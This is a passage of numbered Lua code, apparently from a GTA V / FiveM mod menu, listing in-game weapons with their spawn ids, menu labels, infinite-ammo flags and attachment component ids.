  2180. name = '~h~~r~> ~s~Drum Magazine',
  2182. }
  2183. },
  2184. Flashlight = {
  2185. {
  2186. name = '~h~~r~> ~s~Flashlight',
  2187. id = 'COMPONENT_AT_AR_FLSH'
  2188. }
  2189. },
  2190. BarrelAttachments = {
  2191. {
  2192. name = '~h~~r~> ~s~Suppressor',
  2193. id = 'COMPONENT_AT_AR_SUPP_02'
  2194. }
  2195. },
  2196. Grips = {
  2197. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2198. }
  2199. }
  2200. },
  2201. DoubleBarrelShotgun = {
  2202. id = 'weapon_dbshotgun',
  2203. name = '~h~~r~> ~s~Double Barrel Shotgun',
  2204. bInfAmmo = false,
  2205. mods = {}
  2206. },
  2207. SweeperShotgun = {
  2208. id = 'weapon_autoshotgun',
  2209. name = '~h~~r~> ~s~Sweeper Shotgun',
  2210. bInfAmmo = false,
  2211. mods = {}
  2212. }
  2213. },
  2214. AssaultRifles = {
  2215. AssaultRifle = {
  2216. id = 'weapon_assaultrifle',
  2217. name = '~h~~r~> ~s~Assault Rifle',
  2218. bInfAmmo = false,
  2219. mods = {
  2220. Magazines = {
  2221. {
  2222. name = '~h~~r~> ~s~Default Magazine',
  2224. },
  2225. {
  2226. name = '~h~~r~> ~s~Extended Magazine',
  2228. },
  2229. {
  2230. name = '~h~~r~> ~s~Drum Magazine',
  2232. }
  2233. },
  2234. Sights = {
  2235. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO'}
  2236. },
  2237. Flashlight = {
  2238. {
  2239. name = '~h~~r~> ~s~Flashlight',
  2240. id = 'COMPONENT_AT_AR_FLSH'
  2241. }
  2242. },
  2243. BarrelAttachments = {
  2244. {
  2245. name = '~h~~r~> ~s~Suppressor',
  2246. id = 'COMPONENT_AT_AR_SUPP_02'
  2247. }
  2248. },
  2249. Grips = {
  2250. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2251. }
  2252. }
  2253. },
  2254. AssaultRifleMkII = {
  2255. id = 'weapon_assaultrifle_mk2',
  2256. name = '~h~~r~> ~s~Assault Rifle Mk II',
  2257. bInfAmmo = false,
  2258. mods = {
  2259. Magazines = {
  2260. {
  2261. name = '~h~~r~> ~s~Default Magazine',
  2263. },
  2264. {
  2265. name = '~h~~r~> ~s~Extended Magazine',
  2267. },
  2268. {
  2269. name = '~h~~r~> ~s~Tracer Rounds',
  2271. },
  2272. {
  2273. name = '~h~~r~> ~s~Incendiary Rounds',
  2275. },
  2276. {
  2277. name = '~h~~r~> ~s~Hollow Point Rounds',
  2279. },
  2280. {
  2281. name = '~h~~r~> ~s~FMJ Rounds',
  2283. }
  2284. },
  2285. Sights = {
  2286. {
  2287. name = '~h~~r~> ~s~Holograhpic Sight',
  2288. id = 'COMPONENT_AT_SIGHTS'
  2289. },
  2290. {
  2291. name = '~h~~r~> ~s~Small Scope',
  2293. },
  2294. {
  2295. name = '~h~~r~> ~s~Large Scope',
  2297. }
  2298. },
  2299. Flashlight = {
  2300. {
  2301. name = '~h~~r~> ~s~Flashlight',
  2302. id = 'COMPONENT_AT_AR_FLSH'
  2303. }
  2304. },
  2305. Barrel = {
  2306. {
  2307. name = '~h~~r~> ~s~Default',
  2308. id = 'COMPONENT_AT_AR_BARREL_01'
  2309. },
  2310. {name = '~h~~r~> ~s~Heavy', id = 'COMPONENT_AT_AR_BARREL_0'}
  2311. },
  2312. BarrelAttachments = {
  2313. {
  2314. name = '~h~~r~> ~s~Suppressor',
  2315. id = 'COMPONENT_AT_AR_SUPP_02'
  2316. },
  2317. {
  2318. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2319. id = 'COMPONENT_AT_MUZZLE_01'
  2320. },
  2321. {
  2322. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2323. id = 'COMPONENT_AT_MUZZLE_02'
  2324. },
  2325. {
  2326. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2327. id = 'COMPONENT_AT_MUZZLE_03'
  2328. },
  2329. {
  2330. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2331. id = 'COMPONENT_AT_MUZZLE_04'
  2332. },
  2333. {
  2334. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2335. id = 'COMPONENT_AT_MUZZLE_05'
  2336. },
  2337. {
  2338. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2339. id = 'COMPONENT_AT_MUZZLE_06'
  2340. },
  2341. {
  2342. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2343. id = 'COMPONENT_AT_MUZZLE_07'
  2344. }
  2345. },
  2346. Grips = {
  2347. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
  2348. }
  2349. }
  2350. },
  2351. CarbineRifle = {
  2352. id = 'weapon_carbinerifle',
  2353. name = '~h~~r~> ~s~Carbine Rifle',
  2354. bInfAmmo = false,
  2355. mods = {
  2356. Magazines = {
  2357. {
  2358. name = '~h~~r~> ~s~Default Magazine',
  2360. },
  2361. {
  2362. name = '~h~~r~> ~s~Extended Magazine',
  2364. },
  2365. {
  2366. name = '~h~~r~> ~s~Box Magazine',
  2368. }
  2369. },
  2370. Sights = {
  2371. {
  2372. name = '~h~~r~> ~s~Scope',
  2374. }
  2375. },
  2376. Flashlight = {
  2377. {
  2378. name = '~h~~r~> ~s~Flashlight',
  2379. id = 'COMPONENT_AT_AR_FLSH'
  2380. }
  2381. },
  2382. BarrelAttachments = {
  2383. {
  2384. name = '~h~~r~> ~s~Suppressor',
  2385. id = 'COMPONENT_AT_AR_SUPP'
  2386. }
  2387. },
  2388. Grips = {
  2389. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2390. }
  2391. }
  2392. },
  2393. CarbineRifleMkII = {
  2394. id = 'weapon_carbinerifle_mk2',
  2395. name = '~h~~r~> ~s~Carbine Rifle Mk II ',
  2396. bInfAmmo = false,
  2397. mods = {
  2398. Magazines = {
  2399. {
  2400. name = '~h~~r~> ~s~Default Magazine',
  2402. },
  2403. {
  2404. name = '~h~~r~> ~s~Extended Magazine',
  2406. },
  2407. {
  2408. name = '~h~~r~> ~s~Tracer Rounds',
  2410. },
  2411. {
  2412. name = '~h~~r~> ~s~Incendiary Rounds',
  2414. },
  2415. {
  2416. name = '~h~~r~> ~s~Hollow Point Rounds',
  2418. },
  2419. {
  2420. name = '~h~~r~> ~s~FMJ Rounds',
  2422. }
  2423. },
  2424. Sights = {
  2425. {
  2426. name = '~h~~r~> ~s~Holograhpic Sight',
  2427. id = 'COMPONENT_AT_SIGHTS'
  2428. },
  2429. {
  2430. name = '~h~~r~> ~s~Small Scope',
  2432. },
  2433. {
  2434. name = '~h~~r~> ~s~Large Scope',
  2436. }
  2437. },
  2438. Flashlight = {
  2439. {
  2440. name = '~h~~r~> ~s~Flashlight',
  2441. id = 'COMPONENT_AT_AR_FLSH'
  2442. }
  2443. },
  2444. Barrel = {
  2445. {
  2446. name = '~h~~r~> ~s~Default',
  2447. id = 'COMPONENT_AT_CR_BARREL_01'
  2448. },
  2449. {
  2450. name = '~h~~r~> ~s~Heavy',
  2451. id = 'COMPONENT_AT_CR_BARREL_02'
  2452. }
  2453. },
  2454. BarrelAttachments = {
  2455. {
  2456. name = '~h~~r~> ~s~Suppressor',
  2457. id = 'COMPONENT_AT_AR_SUPP'
  2458. },
  2459. {
  2460. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2461. id = 'COMPONENT_AT_MUZZLE_01'
  2462. },
  2463. {
  2464. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2465. id = 'COMPONENT_AT_MUZZLE_02'
  2466. },
  2467. {
  2468. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2469. id = 'COMPONENT_AT_MUZZLE_03'
  2470. },
  2471. {
  2472. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2473. id = 'COMPONENT_AT_MUZZLE_04'
  2474. },
  2475. {
  2476. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2477. id = 'COMPONENT_AT_MUZZLE_05'
  2478. },
  2479. {
  2480. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2481. id = 'COMPONENT_AT_MUZZLE_06'
  2482. },
  2483. {
  2484. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2485. id = 'COMPONENT_AT_MUZZLE_07'
  2486. }
  2487. },
  2488. Grips = {
  2489. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
  2490. }
  2491. }
  2492. },
  2493. AdvancedRifle = {
  2494. id = 'weapon_advancedrifle',
  2495. name = '~h~~r~> ~s~Advanced Rifle ',
  2496. bInfAmmo = false,
  2497. mods = {
  2498. Magazines = {
  2499. {
  2500. name = '~h~~r~> ~s~Default Magazine',
  2502. },
  2503. {
  2504. name = '~h~~r~> ~s~Extended Magazine',
  2506. }
  2507. },
  2508. Sights = {
  2509. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL'}
  2510. },
  2511. Flashlight = {
  2512. {
  2513. name = '~h~~r~> ~s~Flashlight',
  2514. id = 'COMPONENT_AT_AR_FLSH'
  2515. }
  2516. },
  2517. BarrelAttachments = {
  2518. {
  2519. name = '~h~~r~> ~s~Suppressor',
  2520. id = 'COMPONENT_AT_AR_SUPP'
  2521. }
  2522. }
  2523. }
  2524. },
  2525. SpecialCarbine = {
  2526. id = 'weapon_specialcarbine',
  2527. name = '~h~~r~> ~s~Special Carbine',
  2528. bInfAmmo = false,
  2529. mods = {
  2530. Magazines = {
  2531. {
  2532. name = '~h~~r~> ~s~Default Magazine',
  2534. },
  2535. {
  2536. name = '~h~~r~> ~s~Extended Magazine',
  2538. },
  2539. {
  2540. name = '~h~~r~> ~s~Drum Magazine',
  2542. }
  2543. },
  2544. Sights = {
  2545. {
  2546. name = '~h~~r~> ~s~Scope',
  2548. }
  2549. },
  2550. Flashlight = {
  2551. {
  2552. name = '~h~~r~> ~s~Flashlight',
  2553. id = 'COMPONENT_AT_AR_FLSH'
  2554. }
  2555. },
  2556. BarrelAttachments = {
  2557. {
  2558. name = '~h~~r~> ~s~Suppressor',
  2559. id = 'COMPONENT_AT_AR_SUPP_02'
  2560. }
  2561. },
  2562. Grips = {
  2563. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2564. }
  2565. }
  2566. },
  2567. SpecialCarbineMkII = {
  2568. id = 'weapon_specialcarbine_mk2',
  2569. name = '~h~~r~> ~s~Special Carbine Mk II',
  2570. bInfAmmo = false,
  2571. mods = {
  2572. Magazines = {
  2573. {
  2574. name = '~h~~r~> ~s~Default Magazine',
  2576. },
  2577. {
  2578. name = '~h~~r~> ~s~Extended Magazine',
  2580. },
  2581. {
  2582. name = '~h~~r~> ~s~Tracer Rounds',
  2584. },
  2585. {
  2586. name = '~h~~r~> ~s~Incendiary Rounds',
  2588. },
  2589. {
  2590. name = '~h~~r~> ~s~Hollow Point Rounds',
  2592. },
  2593. {
  2594. name = '~h~~r~> ~s~FMJ Rounds',
  2596. }
  2597. },
  2598. Sights = {
  2599. {
  2600. name = '~h~~r~> ~s~Holograhpic Sight',
  2601. id = 'COMPONENT_AT_SIGHTS'
  2602. },
  2603. {
  2604. name = '~h~~r~> ~s~Small Scope',
  2606. },
  2607. {
  2608. name = '~h~~r~> ~s~Large Scope',
  2610. }
  2611. },
  2612. Flashlight = {
  2613. {
  2614. name = '~h~~r~> ~s~Flashlight',
  2615. id = 'COMPONENT_AT_AR_FLSH'
  2616. }
  2617. },
  2618. Barrel = {
  2619. {
  2620. name = '~h~~r~> ~s~Default',
  2621. id = 'COMPONENT_AT_SC_BARREL_01'
  2622. },
  2623. {
  2624. name = '~h~~r~> ~s~Heavy',
  2625. id = 'COMPONENT_AT_SC_BARREL_02'
  2626. }
  2627. },
  2628. BarrelAttachments = {
  2629. {
  2630. name = '~h~~r~> ~s~Suppressor',
  2631. id = 'COMPONENT_AT_AR_SUPP_02'
  2632. },
  2633. {
  2634. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2635. id = 'COMPONENT_AT_MUZZLE_01'
  2636. },
  2637. {
  2638. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2639. id = 'COMPONENT_AT_MUZZLE_02'
  2640. },
  2641. {
  2642. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2643. id = 'COMPONENT_AT_MUZZLE_03'
  2644. },
  2645. {
  2646. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2647. id = 'COMPONENT_AT_MUZZLE_04'
  2648. },
  2649. {
  2650. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2651. id = 'COMPONENT_AT_MUZZLE_05'
  2652. },
  2653. {
  2654. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2655. id = 'COMPONENT_AT_MUZZLE_06'
  2656. },
  2657. {
  2658. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2659. id = 'COMPONENT_AT_MUZZLE_07'
  2660. }
  2661. },
  2662. Grips = {
  2663. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
  2664. }
  2665. }
  2666. },
  2667. BullpupRifle = {
  2668. id = 'weapon_bullpuprifle',
  2669. name = '~h~~r~> ~s~Bullpup Rifle',
  2670. bInfAmmo = false,
  2671. mods = {
  2672. Magazines = {
  2673. {
  2674. name = '~h~~r~> ~s~Default Magazine',
  2676. },
  2677. {
  2678. name = '~h~~r~> ~s~Extended Magazine',
  2680. }
  2681. },
  2682. Sights = {
  2683. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL'}
  2684. },
  2685. Flashlight = {
  2686. {
  2687. name = '~h~~r~> ~s~Flashlight',
  2688. id = 'COMPONENT_AT_AR_FLSH'
  2689. }
  2690. },
  2691. BarrelAttachments = {
  2692. {
  2693. name = '~h~~r~> ~s~Suppressor',
  2694. id = 'COMPONENT_AT_AR_SUPP'
  2695. }
  2696. },
  2697. Grips = {
  2698. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2699. }
  2700. }
  2701. },
  2702. BullpupRifleMkII = {
  2703. id = 'weapon_bullpuprifle_mk2',
  2704. name = '~h~~r~> ~s~Bullpup Rifle Mk II',
  2705. bInfAmmo = false,
  2706. mods = {
  2707. Magazines = {
  2708. {
  2709. name = '~h~~r~> ~s~Default Magazine',
  2711. },
  2712. {
  2713. name = '~h~~r~> ~s~Extended Magazine',
  2715. },
  2716. {
  2717. name = '~h~~r~> ~s~Tracer Rounds',
  2719. },
  2720. {
  2721. name = '~h~~r~> ~s~Incendiary Rounds',
  2723. },
  2724. {
  2725. name = '~h~~r~> ~s~Armor Piercing Rounds',
  2727. },
  2728. {
  2729. name = '~h~~r~> ~s~FMJ Rounds',
  2731. }
  2732. },
  2733. Sights = {
  2734. {
  2735. name = '~h~~r~> ~s~Holograhpic Sight',
  2736. id = 'COMPONENT_AT_SIGHTS'
  2737. },
  2738. {
  2739. name = '~h~~r~> ~s~Small Scope',
  2740. id = 'COMPONENT_AT_SCOPE_MACRO_02_MK2'
  2741. },
  2742. {
  2743. name = '~h~~r~> ~s~Medium Scope',
  2745. }
  2746. },
  2747. Flashlight = {
  2748. {
  2749. name = '~h~~r~> ~s~Flashlight',
  2750. id = 'COMPONENT_AT_AR_FLSH'
  2751. }
  2752. },
  2753. Barrel = {
  2754. {
  2755. name = '~h~~r~> ~s~Default',
  2756. id = 'COMPONENT_AT_BP_BARREL_01'
  2757. },
  2758. {
  2759. name = '~h~~r~> ~s~Heavy',
  2760. id = 'COMPONENT_AT_BP_BARREL_02'
  2761. }
  2762. },
  2763. BarrelAttachments = {
  2764. {
  2765. name = '~h~~r~> ~s~Suppressor',
  2766. id = 'COMPONENT_AT_AR_SUPP'
  2767. },
  2768. {
  2769. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2770. id = 'COMPONENT_AT_MUZZLE_01'
  2771. },
  2772. {
  2773. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2774. id = 'COMPONENT_AT_MUZZLE_02'
  2775. },
  2776. {
  2777. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2778. id = 'COMPONENT_AT_MUZZLE_03'
  2779. },
  2780. {
  2781. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2782. id = 'COMPONENT_AT_MUZZLE_04'
  2783. },
  2784. {
  2785. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2786. id = 'COMPONENT_AT_MUZZLE_05'
  2787. },
  2788. {
  2789. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2790. id = 'COMPONENT_AT_MUZZLE_06'
  2791. },
  2792. {
  2793. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2794. id = 'COMPONENT_AT_MUZZLE_07'
  2795. }
  2796. },
  2797. Grips = {
  2798. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2799. }
  2800. }
  2801. },
  2802. CompactRifle = {
  2803. id = 'weapon_compactrifle',
  2804. name = '~h~~r~> ~s~Compact Rifle',
  2805. bInfAmmo = false,
  2806. mods = {
  2807. Magazines = {
  2808. {
  2809. name = '~h~~r~> ~s~Default Magazine',
  2811. },
  2812. {
  2813. name = '~h~~r~> ~s~Extended Magazine',
  2815. },
  2816. {
  2817. name = '~h~~r~> ~s~Drum Magazine',
  2819. }
  2820. }
  2821. }
  2822. }
  2823. },
  2824. LMG = {
  2825. MG = {
  2826. id = 'weapon_mg',
  2827. name = '~h~~r~> ~s~MG',
  2828. bInfAmmo = false,
  2829. mods = {
  2830. Magazines = {
  2831. {
  2832. name = '~h~~r~> ~s~Default Magazine',
  2833. id = 'COMPONENT_MG_CLIP_01'
  2834. },
  2835. {
  2836. name = '~h~~r~> ~s~Extended Magazine',
  2837. id = 'COMPONENT_MG_CLIP_02'
  2838. }
  2839. },
  2840. Sights = {
  2841. {
  2842. name = '~h~~r~> ~s~Scope',
  2843. id = 'COMPONENT_AT_SCOPE_SMALL_02'
  2844. }
  2845. }
  2846. }
  2847. },
  2848. CombatMG = {
  2849. id = 'weapon_combatmg',
  2850. name = '~h~~r~> ~s~Combat MG',
  2851. bInfAmmo = false,
  2852. mods = {
  2853. Magazines = {
  2854. {
  2855. name = '~h~~r~> ~s~Default Magazine',
  2857. },
  2858. {
  2859. name = '~h~~r~> ~s~Extended Magazine',
  2861. }
  2862. },
  2863. Sights = {
  2864. {
  2865. name = '~h~~r~> ~s~Scope',
  2867. }
  2868. },
  2869. Grips = {
  2870. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  2871. }
  2872. }
  2873. },
  2874. CombatMGMkII = {
  2875. id = 'weapon_combatmg_mk2',
  2876. name = '~h~~r~> ~s~Combat MG Mk II',
  2877. bInfAmmo = false,
  2878. mods = {
  2879. Magazines = {
  2880. {
  2881. name = '~h~~r~> ~s~Default Magazine',
  2883. },
  2884. {
  2885. name = '~h~~r~> ~s~Extended Magazine',
  2887. },
  2888. {
  2889. name = '~h~~r~> ~s~Tracer Rounds',
  2891. },
  2892. {
  2893. name = '~h~~r~> ~s~Incendiary Rounds',
  2895. },
  2896. {
  2897. name = '~h~~r~> ~s~Hollow Point Rounds',
  2899. },
  2900. {
  2901. name = '~h~~r~> ~s~FMJ Rounds',
  2903. }
  2904. },
  2905. Sights = {
  2906. {
  2907. name = '~h~~r~> ~s~Holograhpic Sight',
  2908. id = 'COMPONENT_AT_SIGHTS'
  2909. },
  2910. {
  2911. name = '~h~~r~> ~s~Medium Scope',
  2913. },
  2914. {
  2915. name = '~h~~r~> ~s~Large Scope',
  2917. }
  2918. },
  2919. Barrel = {
  2920. {
  2921. name = '~h~~r~> ~s~Default',
  2922. id = 'COMPONENT_AT_MG_BARREL_01'
  2923. },
  2924. {
  2925. name = '~h~~r~> ~s~Heavy',
  2926. id = 'COMPONENT_AT_MG_BARREL_02'
  2927. }
  2928. },
  2929. BarrelAttachments = {
  2930. {
  2931. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2932. id = 'COMPONENT_AT_MUZZLE_01'
  2933. },
  2934. {
  2935. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2936. id = 'COMPONENT_AT_MUZZLE_02'
  2937. },
  2938. {
  2939. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2940. id = 'COMPONENT_AT_MUZZLE_03'
  2941. },
  2942. {
  2943. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2944. id = 'COMPONENT_AT_MUZZLE_04'
  2945. },
  2946. {
  2947. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2948. id = 'COMPONENT_AT_MUZZLE_05'
  2949. },
  2950. {
  2951. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2952. id = 'COMPONENT_AT_MUZZLE_06'
  2953. },
  2954. {
  2955. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2956. id = 'COMPONENT_AT_MUZZLE_07'
  2957. }
  2958. },
  2959. Grips = {
  2960. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
  2961. }
  2962. }
  2963. },
  2964. GusenbergSweeper = {
  2965. id = 'weapon_gusenberg',
  2966. name = '~h~~r~> ~s~GusenbergSweeper',
  2967. bInfAmmo = false,
  2968. mods = {
  2969. Magazines = {
  2970. {
  2971. name = '~h~~r~> ~s~Default Magazine',
  2973. },
  2974. {
  2975. name = '~h~~r~> ~s~Extended Magazine',
  2977. }
  2978. }
  2979. }
  2980. }
  2981. },
  2982. Snipers = {
  2983. SniperRifle = {
  2984. id = 'weapon_sniperrifle',
  2985. name = '~h~~r~> ~s~Sniper Rifle',
  2986. bInfAmmo = false,
  2987. mods = {
  2988. Sights = {
  2989. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_LARGE'},
  2990. {
  2991. name = '~h~~r~> ~s~Advanced Scope',
  2993. }
  2994. },
  2995. BarrelAttachments = {
  2996. {
  2997. name = '~h~~r~> ~s~Suppressor',
  2998. id = 'COMPONENT_AT_AR_SUPP_02'
  2999. }
  3000. }
  3001. }
  3002. },
  3003. HeavySniper = {
  3004. id = 'weapon_heavysniper',
  3005. name = '~h~~r~> ~s~Heavy Sniper',
  3006. bInfAmmo = false,
  3007. mods = {
  3008. Sights = {
  3009. {name = '~h~~r~> ~s~Scope', id = 'COMPONENT_AT_SCOPE_LARGE'},
  3010. {
  3011. name = '~h~~r~> ~s~Advanced Scope',
  3013. }
  3014. }
  3015. }
  3016. },
  3017. HeavySniperMkII = {
  3018. id = 'weapon_heavysniper_mk2',
  3019. name = '~h~~r~> ~s~Heavy Sniper Mk II',
  3020. bInfAmmo = false,
  3021. mods = {
  3022. Magazines = {
  3023. {
  3024. name = '~h~~r~> ~s~Default Magazine',
  3026. },
  3027. {
  3028. name = '~h~~r~> ~s~Extended Magazine',
  3030. },
  3031. {
  3032. name = '~h~~r~> ~s~Incendiary Rounds',
  3034. },
  3035. {
  3036. name = '~h~~r~> ~s~Armor Piercing Rounds',
  3038. },
  3039. {
  3040. name = '~h~~r~> ~s~FMJ Rounds',
  3042. },
  3043. {
  3044. name = '~h~~r~> ~s~Explosive Rounds',
  3046. }
  3047. },
  3048. Sights = {
  3049. {
  3050. name = '~h~~r~> ~s~Zoom Scope',
  3052. },
  3053. {
  3054. name = '~h~~r~> ~s~Advanced Scope',
  3056. },
  3057. {
  3058. name = '~h~~r~> ~s~Nigt Vision Scope',
  3059. id = 'COMPONENT_AT_SCOPE_NV'
  3060. },
  3061. {
  3062. name = '~h~~r~> ~s~Thermal Scope',
  3064. }
  3065. },
  3066. Barrel = {
  3067. {
  3068. name = '~h~~r~> ~s~Default',
  3069. id = 'COMPONENT_AT_SR_BARREL_01'
  3070. },
  3071. {
  3072. name = '~h~~r~> ~s~Heavy',
  3073. id = 'COMPONENT_AT_SR_BARREL_02'
  3074. }
  3075. },
  3076. BarrelAttachments = {
  3077. {
  3078. name = '~h~~r~> ~s~Suppressor',
  3079. id = 'COMPONENT_AT_SR_SUPP_03'
  3080. },
  3081. {
  3082. name = '~h~~r~> ~s~Squared Muzzle Brake',
  3083. id = 'COMPONENT_AT_MUZZLE_08'
  3084. },
  3085. {
  3086. name = '~h~~r~> ~s~Bell-End Muzzle Brake',
  3087. id = 'COMPONENT_AT_MUZZLE_09'
  3088. }
  3089. }
  3090. }
  3091. },
  3092. MarksmanRifle = {
  3093. id = 'weapon_marksmanrifle',
  3094. name = '~h~~r~> ~s~Marksman Rifle',
  3095. bInfAmmo = false,
  3096. mods = {
  3097. Magazines = {
  3098. {
  3099. name = '~h~~r~> ~s~Default Magazine',
  3101. },
  3102. {
  3103. name = '~h~~r~> ~s~Extended Magazine',
  3105. }
  3106. },
  3107. Sights = {
  3108. {
  3109. name = '~h~~r~> ~s~Scope',
  3111. }
  3112. },
  3113. Flashlight = {
  3114. {
  3115. name = '~h~~r~> ~s~Flashlight',
  3116. id = 'COMPONENT_AT_AR_FLSH'
  3117. }
  3118. },
  3119. BarrelAttachments = {
  3120. {
  3121. name = '~h~~r~> ~s~Suppressor',
  3122. id = 'COMPONENT_AT_AR_SUPP'
  3123. }
  3124. },
  3125. Grips = {
  3126. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP'}
  3127. }
  3128. }
  3129. },
  3130. MarksmanRifleMkII = {
  3131. id = 'weapon_marksmanrifle_mk2',
  3132. name = '~h~~r~> ~s~Marksman Rifle Mk II',
  3133. bInfAmmo = false,
  3134. mods = {
  3135. Magazines = {
  3136. {
  3137. name = '~h~~r~> ~s~Default Magazine',
  3139. },
  3140. {
  3141. name = '~h~~r~> ~s~Extended Magazine',
  3143. },
  3144. {
  3145. name = '~h~~r~> ~s~Tracer Rounds',
  3147. },
  3148. {
  3149. name = '~h~~r~> ~s~Incendiary Rounds',
  3151. },
  3152. {
  3153. name = '~h~~r~> ~s~Hollow Point Rounds',
  3155. },
  3156. {
  3157. name = '~h~~r~> ~s~FMJ Rounds',
  3159. }
  3160. },
  3161. Sights = {
  3162. {
  3163. name = '~h~~r~> ~s~Holograhpic Sight',
  3164. id = 'COMPONENT_AT_SIGHTS'
  3165. },
  3166. {
  3167. name = '~h~~r~> ~s~Large Scope',
  3169. },
  3170. {
  3171. name = '~h~~r~> ~s~Zoom Scope',
  3173. }
  3174. },
  3175. Flashlight = {
  3176. {
  3177. name = '~h~~r~> ~s~Flashlight',
  3178. id = 'COMPONENT_AT_AR_FLSH'
  3179. }
  3180. },
  3181. Barrel = {
  3182. {
  3183. name = '~h~~r~> ~s~Default',
  3184. id = 'COMPONENT_AT_MRFL_BARREL_01'
  3185. },
  3186. {
  3187. name = '~h~~r~> ~s~Heavy',
  3188. id = 'COMPONENT_AT_MRFL_BARREL_02'
  3189. }
  3190. },
  3191. BarrelAttachments = {
  3192. {
  3193. name = '~h~~r~> ~s~Suppressor',
  3194. id = 'COMPONENT_AT_AR_SUPP'
  3195. },
  3196. {
  3197. name = '~h~~r~> ~s~Flat Muzzle Brake',
  3198. id = 'COMPONENT_AT_MUZZLE_01'
  3199. },
  3200. {
  3201. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  3202. id = 'COMPONENT_AT_MUZZLE_02'
  3203. },
  3204. {
  3205. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  3206. id = 'COMPONENT_AT_MUZZLE_03'
  3207. },
  3208. {
  3209. name = '~h~~r~> ~s~Precision Muzzle Brake',
  3210. id = 'COMPONENT_AT_MUZZLE_04'
  3211. },
  3212. {
  3213. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  3214. id = 'COMPONENT_AT_MUZZLE_05'
  3215. },
  3216. {
  3217. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  3218. id = 'COMPONENT_AT_MUZZLE_06'
  3219. },
  3220. {
  3221. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  3222. id = 'COMPONENT_AT_MUZZLE_07'
  3223. }
  3224. },
  3225. Grips = {
  3226. {name = '~h~~r~> ~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02'}
  3227. }
  3228. }
  3229. }
  3230. },
  3231. Heavy = {
  3232. RPG = {
  3233. id = 'weapon_rpg',
  3234. name = '~h~~r~> ~s~RPG',
  3235. bInfAmmo = false,
  3236. mods = {}
  3237. },
  3238. GrenadeLauncher = {
  3239. id = 'weapon_grenadelauncher',
  3240. name = '~h~~r~> ~s~Grenade Launcher',
  3241. bInfAmmo = false,
  3242. mods = {}
  3243. },
  3244. GrenadeLauncherSmoke = {
  3245. id = 'weapon_grenadelauncher_smoke',
  3246. name = '~h~~r~> ~s~Grenade Launcher Smoke',
  3247. bInfAmmo = false,
  3248. mods = {}
  3249. },
  3250. Minigun = {
  3251. id = 'weapon_minigun',
  3252. name = '~h~~r~> ~s~Minigun',
  3253. bInfAmmo = false,
  3254. mods = {}
  3255. },
  3256. FireworkLauncher = {
  3257. id = 'weapon_firework',
  3258. name = '~h~~r~> ~s~Firework Launcher',
  3259. bInfAmmo = false,
  3260. mods = {}
  3261. },
  3262. Railgun = {
  3263. id = 'weapon_railgun',
  3264. name = '~h~~r~> ~s~Railgun',
  3265. bInfAmmo = false,
  3266. mods = {}
  3267. },
  3268. HomingLauncher = {
  3269. id = 'weapon_hominglauncher',
  3270. name = '~h~~r~> ~s~Homing Launcher',
  3271. bInfAmmo = false,
  3272. mods = {}
  3273. },
  3274. CompactGrenadeLauncher = {
  3275. id = 'weapon_compactlauncher',
